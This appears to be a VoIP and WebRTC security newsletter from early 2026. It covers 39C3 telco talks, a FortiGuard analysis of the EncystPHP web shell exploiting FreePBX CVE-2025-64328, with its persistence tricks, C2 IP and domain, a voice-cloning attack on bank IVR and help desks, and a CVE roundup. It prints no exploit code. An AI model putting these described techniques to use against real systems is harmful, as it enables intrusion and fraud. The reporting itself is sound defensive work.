Our news
Back to breaking things in
2026
We’re back to pentesting full time in 2026. Right now we’re working
on an engagement involving media streaming based on Wowza together with
Janus for the WebRTC side, along with various API calls and many other
interesting components. The vulnerabilities we’re finding are very
specific to the software stack and the client, so we can’t disclose
much. But this is a really interesting area where media streaming and
WebRTC intersect. Protocols like HLS, RTMP and SRT are always fun to
mess with, and these systems rely heavily on the security of the APIs
they’re built on. This is clearly an undertested area in cybersecurity,
and we’re finding a lot of good stuff. We have some experience with
Janus, but it’s always fun to poke at and figure out what could go
wrong. Wowza is new territory for us though, and it’s been a great
learning experience so far.
In 2025 we did a number of VoIP pentests that almost all had the
usual suspects: RTP Bleed, RTP Inject, DoS on signaling through SIP
message flooding. Well-known issues, but clearly not well-tested. We
also covered other targets beyond SIP. HTTP is found everywhere, but
most APIs and webapps are surprisingly fragile and vulnerable to
application-layer DoS. Hardcoded secrets are still showing up in 2025
and 2026, both in desktop applications and in JavaScript exposed on the
Internet.
With that, we look forward to a year of vulnerabilities, security
fixes, infused with AI and its effects on cybersecurity!
What’s happening?
39C3 talks of interest
The 39th Chaos Communication Congress (39C3), held in December 2025,
featured some great talks touching on telco security, satellite
eavesdropping, and legacy telephony.
Learning
from South Korean Telco Breaches is a must-watch for anyone working
with VoLTE and SIP. Researchers described how VoLTE implementation
weaknesses at KT (Korea Telecom) led to a major operator billing breach
through SMS and voice payload hijacking. Some of the findings
presented:
- Researchers showed SIP traffic transmitted in clear text on certain
configurations (e.g. older Xiaomi phones with Qualcomm modems had no
ciphering or integrity protection for SIP)
- The talk demonstrated encryption downgrades using SIP 401/406
responses to disable IPSec
- The South Korean TTA VoLTE standard deviated from the 3GPP spec (TS
33.203), allowing connections to proceed even when security negotiation
failed
- Femtocells gave attackers direct access to the S1 user plane in
clear text
- The talk noted that carrier profiles, including on iOS, did not
enable IPSec for IMS traffic for over a decade
Don’t
look up: There are sensitive internal links in the clear on GEO
satellites (research paper: PDF)
demonstrates SIP and RTP traffic broadcast in the clear over
geostationary satellite links used for cellular backhaul. Providers
strip LTE encryption at the tower and treat the satellite link as
trusted internal infrastructure, inadvertently broadcasting raw call
contents across a continental footprint. Some highlights:
- T-Mobile tower traffic in remote US regions used IPSec with a null
cipher, allowing researchers to recover full phone call audio
- Telmex traffic from Mexico included unencrypted SIP call setup and
voice data
- Researchers also observed unencrypted VoIP traffic directed at a
city with a large US Navy base
ISDN
+ POTS Telephony at Congress and Camp is a fun one. While the main
Congress phone infrastructure (POC) has fully migrated to VoIP, this
talk covers building a vintage ISDN and POTS network for services that
VoIP handles poorly: dial-up modems, ISDN data calls, fax, and older
protocols like BTX and Minitel. The legacy Siemens EWSD switch connects
to the VoIP world through an ISDN-to-SIP gateway called “Noodle”.
EncystPHP
web shell exploits FreePBX CVE-2025-64328
FortiGuard Labs published
a report on EncystPHP, a weaponized web shell that exploits CVE-2025-64328
(post-authentication command injection in FreePBX Endpoint Manager). We
covered this CVE in the November
2025 newsletter. This report shows the vulnerability is now being
actively exploited in the wild.
The attack is attributed to INJ3CTOR3, a threat
actor group that has been targeting VoIP infrastructure for years. Check
Point Research first
documented them in 2020 exploiting CVE-2019-19006
on Asterisk systems. Their main goal is selling phone numbers, call
plans, and live access to compromised VoIP services. They moved to
exploiting Elastix systems via CVE-2021-45461
in 2021-2022. So this group is no stranger to PBX systems.
The EncystPHP webshell is quite thorough in what it does:
- Persistence: Creates a root-level user account
(
newfpbx), injects SSH keys, and sets up crontab entries to
re-download the payload every minute.
- Competing malware removal: The dropper actively
hunts and removes other webshells on the system, deleting files
containing strings like “Badr”, “b3d0r”, and “pastebin”.
- Webshell deployment: Copies itself to multiple
FreePBX module directories disguised as
ajax.php, with
timestamp forgery and .htaccess URL rewriting to avoid
detection.
- PBX-aware functionality: The webshell interface
(titled “Ask Master”) includes Asterisk channel queries and SIP peer
listings alongside the usual file enumeration and command execution. It
is designed to work in both FreePBX and Elastix environments.
- C2 infrastructure: Traffic originates from Brazil
(
45.234.176.202), with a C2 domain
(crm.razatelefonia.pro) that appears to be a VoIP
management system frontend.
The current campaign started around December 2025 and targets FreePBX
Endpoint Manager versions 17.0.2.36 through 17.0.3.
This month we take a look at two browser-based, privacy-focused tools
for voice and video communication built on WebRTC. Element Call has been
in the works for a while and shipped as the default call experience in
Element X back in September
2024, but a detailed architecture
talk at Matrix Conference 2025 gave us a closer look at the security
and privacy design. Magicall, on the other hand, is a brand new entrant
from a cryptography consultancy. Both promise End-to-End Encryption
(E2EE) and various privacy features. Note that we have not tested the
security of these tools ourselves. This is a quick review based on what
these projects claim to offer, to give you an idea of what’s happening
in this space.
Element Call
Element
Call is a federated real-time communication platform built on the
Matrix protocol. At Enable Security we are fans of the
Matrix protocol and their vision, so we’re glad to see them finally
moving away from third-party conferencing systems (e.g., Jitsi in the
past) to a native solution tied to the rest of the platform. They still
rely on third-party software (LiveKit SFU), but this is now tightly
integrated. Such changes help significantly in reducing the gap between
user expectations of security and privacy versus reality.
Here is a summary of the security and privacy features that make
MatrixRTC attractive:
- True end-to-end encryption (E2EE): MatrixRTC uses
“Insertable Streams” (frame-level encryption) to encrypt media on the
client device before it reaches the network. This ensures the server
(SFU) forwards opaque packets and cannot decrypt or view the content,
even while managing bandwidth.
- Sovereign multi-SFU architecture: Unlike
centralized platforms, MatrixRTC allows a multi-SFU setup where
participants publish media to their own homeserver’s SFU. This
ensures users keep control of their media upload path and data remains
within their trusted infrastructure.
- Metadata sovereignty: Users choose where their
metadata resides (on their self-hosted or chosen homeserver) rather than
exposing interaction data to a single centralized vendor.
- Granular access control: The system strictly
enforces Matrix room permissions, distinguishing between “full-access”
users (who can publish media) and “restricted” users. This prevents
unauthorized participants from consuming server resources or injecting
media into the call.
- “Invisible” cryptography: The framework is moving
to exclude non-cross-signed devices entirely, ensuring that only
verified, trusted devices can participate in encrypted calls,
eliminating the risk of unverified eavesdroppers.
- Traffic obfuscation: Support for
TURN-TLS allows RTC traffic over TLS on port 443,
helping it blend with typical HTTPS/TLS egress and traverse restrictive
firewalls.
Status: Actively developed as the next-generation
conferencing solution for the Matrix ecosystem.
Magicall
Magicall is a brand new
browser-based, end-to-end encrypted video calling service built by
Symbolic Software, a Paris-based cryptography
consultancy. It operates on a “zero friction” model, requiring no
accounts for guests and no software downloads.
The key security and privacy features include:
- True end-to-end encryption (E2EE): All video,
audio, and chat are encrypted directly in the browser using AES-256-GCM
(SFrame) before they ever reach the network.
- Zero-knowledge architecture: Servers act as “dumb
relays” that route encrypted blobs; they cannot decrypt your calls or
read your messages.
- Anti-tamper verification: Features “Short
Authentication Strings” (SAS) that allow you to verify participants via
a 4-word code, ensuring no Man-in-the-Middle (MITM) attacks are
occurring.
- Strict privacy guarantees: The service promises no
AI training on your calls, no ads, and no selling of user data.
- EU jurisdiction & GDPR: Symbolic Software, a
French company, built and hosts the platform in the EU, with full GDPR
compliance by default.
- Cryptography background: The team has a track
record in applied cryptography and has participated in public security
reviews (e.g., 1Password’s cryptography review with Cure53).
- Double layer protection: Media is protected by two
layers of encryption: E2E (SFrame) plus standard WebRTC transport
encryption (SRTP).
Trust Model: Users must trust the server delivers
unmodified JavaScript; also relies on browser WebCrypto and
RTCRtpScriptTransform integrity.
Status: Alpha (as of January 2026). Supports up to
256 participants in the Pro tier.
Phone
phreaking, social engineering in the age of voice AI and voice
biometrics
Skyler Tuter, a security consultant from TrustedSec,
gave a presentation at
Wild West Hackin’ Fest in Deadwood, South Dakota. The talk, “Exploiting
AI: A Case Study on Voice Biometric Penetration Testing”, covers
AI-driven voice cloning against both IVR systems and
human help desk agents.
The first case study details the compromise of a bank’s Interactive
Voice Response (IVR) system, where 8 out of 9 test accounts were
accessed by bypassing voice print verification. The second demonstrates
impersonation of a corporate CIO, leading a help desk agent to reset
administrator account passwords within a two-minute phone call.
I found it quite entertaining as it involves caller ID spoofing (with
Zoiper), bypassing biometric matching by using AI voice cloning from
ElevenLabs, no multi-attempt lockout policy and a pinch of social
engineering. The presentation doesn’t go into the telephony setup
details, but they likely interfaced with the target bank through SIP or
used a phone provider that allowed spoofed caller IDs for PSTN. That
side of the attack chain would have been interesting to hear more
about.
What makes this relevant for our audience is that the VoIP and
telephony layer is the enabler for these attacks. Caller ID spoofing via
SIP, the ability to programmatically place calls, and the lack of
authentication at the network level are what make AI voice cloning
practical. As voice biometrics become more common in banking and
enterprise environments, the telephony infrastructure that VoIP/UC
engineers build and maintain becomes a direct part of the attack
surface. If you’re running voice systems that rely on caller ID or voice
biometrics for any form of trust, this talk is worth watching.
Yealink RPS
vulnerability finally gets a CVE
Yealink has published a security
bulletin acknowledging CVE-2025-68644
(CVSS 7.4), an unauthorized information disclosure vulnerability in
their Redirect and Provisioning Service (RPS). If you’ve been following
our coverage, this is the same issue that researchers Jeroen Hermans and
Stefan Gloor have been disclosing since mid-2025.
We first covered this in the June
2025 newsletter when the researchers published on Full Disclosure,
and again in August
2025 when they presented at the WHY 2025 hacker camp. At the time,
Yealink’s own advisories downplayed the severity and lacked detail. The
researchers disagreed, pointing out that the CA private key shipped with
every phone allowed attackers to access provisioning data (including SIP
credentials) for any Yealink device worldwide.
Now, months later, Yealink has assigned CVE-2025-68644 and published
a third-party
verification report by NetSPI confirming the remediation. According
to the bulletin, RPS instances before 2025-06-27 were affected, and the
fix was applied cloud-side through an enhanced authentication
mechanism.
Timeline
- 2025-05-19: Researchers report the issue to
Yealink.
- 2025-06-20/21: Public disclosure on Full Disclosure
mailing list.
- 2025-06-27: Yealink claims the issue was fixed
cloud-side. RPS instances before this date were affected.
- 2025-08-11/12: Research presented publicly at WHY
2025 (CCC ecosystem).
- 2025-09-19: NetSPI remediation testing date (per
report).
- 2025-09-29: NetSPI report date (per report).
- 2025-11-27: Yealink publishes the Trust Center
bulletin and acknowledges CVE-2025-68644.
- 2025-12-21: Earliest archive.org capture of both
the bulletin page and the NetSPI PDF.
It took over six months from initial disclosure to a formal CVE
acknowledgement. The timeline is worth noting for anyone dealing with
Yealink vulnerability disclosures in the future.
Security
Updates and Vulnerability News Round-Up
An actively exploited remote code execution vulnerability (CVE-2026-20045,
CVSS 8.2) affecting Cisco Unified Communications Manager, UCM SME, IM
& Presence Service, Unity Connection, and Webex Calling Dedicated
Instance. Cisco PSIRT reports attempted exploitation in the wild and
broad scanning for exposed interfaces, and CISA added it to the KEV
catalog. Cisco lists 14SU5 as the first fixed release for 14.x and 15SU4
(scheduled March 2026) as the first fixed release for 15.x; COP patch
files exist for certain interim SU releases (and 12.5 must migrate to a
fixed release).
Original
content here.
A critical command injection vulnerability (CVE-2026-22844,
CVSS 9.9) in Zoom Node Multimedia Routers (MMR) allows authenticated
meeting participants to execute arbitrary code remotely. Affects Zoom
Node Meetings Hybrid and Meeting Connector versions before 5.2.1716.0.
This could enable compromise of multimedia routing infrastructure.
Upgrade to MMR version 5.2.1716.0 or later.
Original
content here.
Two zero-day vulnerabilities in the ALGO 8180 IP Audio Alerter allow
unauthenticated remote code execution via crafted SIP traffic. CVE-2026-0792
is a stack-based buffer overflow triggered through a crafted SIP INVITE
Alert-Info header, and CVE-2026-0794
is a use-after-free in SIP call handling. Discovered by Vera Mens at
Claroty Research (Team82) and published via ZDI. No patches available;
ZDI recommends restricting SIP exposure and network isolation.
Original
content here.
A critical authentication bypass (CVE-2025-67822)
in the Provisioning Manager of Mitel MiVoice MX-ONE affects versions
7.3.0.0.50 through 7.8.1.0.14. The vulnerability allows unauthorized
access to admin accounts.
Original
content here.
Rapid7 released a Metasploit
module that leverages the FreePBX “Rabbit Hole” issues to perform an
unauthenticated SQL injection and create a new FreePBX administrative
user (CVE-2025-66039
and CVE-2025-61675).
We covered these vulnerabilities in the December
2025 edition.
Original
content here.
A cryptographic weakness (CVE-2025-69217,
CVSS 7.7) in coturn versions 4.6.2r5 through 4.7.0-r4 where a 2023
commit replaced OpenSSL’s RAND_bytes with the unsafe libc
random() function. An attacker observing roughly 50
sequential nonces can reconstruct the RNG state, predict future nonces
and relay port allocation, and send authenticated TURN requests from
spoofed IPs (if credentials are known). Reported by Mathy Vanhoef and jornlp. Upgrade to 4.8.0 or
later.
Original
content here.
A high-severity elevation of privilege vulnerability (CVE-2026-20931,
CVSS 8.0) in Windows Telephony Service (TAPISRV) allows an
authorized attacker to elevate privileges over an adjacent network by
exploiting external control of file name or path. Patched in the January
2026 Patch Tuesday.
Original
content here.
Pexip Infinity v39 fixes multiple WebRTC-related denial of service
issues. A crafted media stream can trigger a controlled abort in media
processing (CVE-2025-66379),
crafted signalling can cause a temporary DoS when “Direct Media for
WebRTC” is enabled (CVE-2025-66443),
and insufficient access control in RTMP allows attackers to disconnect
streams traversing a Proxy Node (CVE-2025-66378).
Upgrade to v39.
Original
content here.
A dialplan injection vulnerability (CVE-2025-69205,
CVSS 6.3) in the Asterisk federation feature of µURU allows injection of
special characters into the Dial() application through
improper input validation on federation names. This enables unauthorized
call redirection and potential toll fraud. Reported by Moritz Wörmann and patched in a commit.
Original
content here.
Staff at Kensington and Chelsea, Westminster City, and Hammersmith
and Fulham councils were targeted
through Microsoft Teams with follow-on social engineering
(unexpected calls and meeting invitations) after a breach in late 2025.
Teams continues to be a first-class phishing and initial-access
surface.
Original
content here.
Starting January 12, 2026, Microsoft Teams automatically
enables messaging safety features by default, including file type
protection, malicious URL detection, and user reporting. Applies to
tenants using default safety configurations. Worth noting that these
defaults protect internal tenant messaging but don’t address the
cross-tenant guest access architecture issue where users lose home
organization Defender protections when joining external tenants.
Original
content here.
A medium severity vulnerability (CVE-2025-20335,
CVSS 5.3) in Cisco Desk Phone 9800, IP Phone 7800/8800, and Video Phone
8875 allows unauthenticated remote attackers to write arbitrary files
through inadequate directory permission controls. Requires Web Access to
be enabled (disabled by default).
Original
content here.
An information disclosure vulnerability (CVE-2025-20336)
in the same Cisco phone models (Desk Phone 9800, IP Phone 7800/8800,
Video Phone 8875) allows unauthenticated remote attackers to access
sensitive data. Also requires Web Access to be enabled.
Original
content here.
A SIP-based denial of service vulnerability (CVE-2025-15542,
CVSS 6.3) in TP-Link VX800v v1.0 allows unauthenticated attackers to
flood the device with crafted INVITE messages, blocking all incoming
voice calls. Fixed in firmware 800.0.12 (Build 250912).
Original
content here.
